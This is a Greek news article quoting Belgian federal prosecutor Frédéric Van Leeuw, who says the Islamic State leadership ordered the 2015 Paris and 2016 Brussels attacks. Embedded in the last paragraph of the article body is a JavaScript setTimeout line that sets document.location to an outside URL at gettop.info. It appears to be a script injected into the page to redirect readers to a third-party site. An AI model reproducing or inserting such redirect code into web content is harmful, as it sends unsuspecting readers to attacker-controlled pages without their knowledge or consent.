Η ηγεσία του Ισλαμικού Κράτους έδωσε εντολή για τις επιθέσεις σε Παρίσι και Βρυξέλλες

0
17

 

Ο πυρήνας των τζιχαντιστών που διέπραξε τις επιθέσεις της 13ης Νοεμβρίου του 2015 στο Παρίσι και της 22ας Μαρτίου του 2016 στις Βρυξέλλες έλαβε εντολές από «πολύ ψηλά», στην ιεραρχία της οργάνωσης Ισλαμικό Κράτος, επιβεβαίωσε μιλώντας στο Γαλλικό Πρακτορείο ο ομοσπονδιακός εισαγγελέας του Βελγίου Φρεντερίκ Φαν Λέου.

«Γνωρίζουμε ότι οι εντολές εστάλησαν από πολύ ψηλά στην ιεραρχία του Ισλαμικού Κράτους», επισήμανε ο επικεφαλής των ομοσπονδιακών εισαγγελικών αρχών, που έχει αναλάβει τις αντιτρομοκρατικές υποθέσεις στο Βέλγιο.

Ωστόσο, δεν διευκρίνισε, εάν τα πρόσωπα που έδωσαν τις εντολές βρίσκονται στην ιρακινή ή τη συριακή πλευρά της ζώνης που ελέγχεται από το Ισλαμικό Κράτος, υπογραμμίζοντας ότι ορισμένοι εκ των ηγετών του, όπως ο ηγέτης του Αμπού Μπακρ Αλ Μπαγκντάντι, «μετακινείται» από την μια περιοχή στην άλλη, ανάλογα με το ποιες περιοχές πλήττονται από τους αεροπορικούς βομβαρδισμούς που διαπράττουν οι ΗΠΑ με στόχο την εξουδετέρωσή τους.

Την ευθύνη για τις επιθέσεις στο Παρίσι της 13ης Νοεμβρίου (130 νεκροί) και εκείνες στις Βρυξέλλες (32 νεκροί) είχε αναλάβει το Ισλαμικό Κράτος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here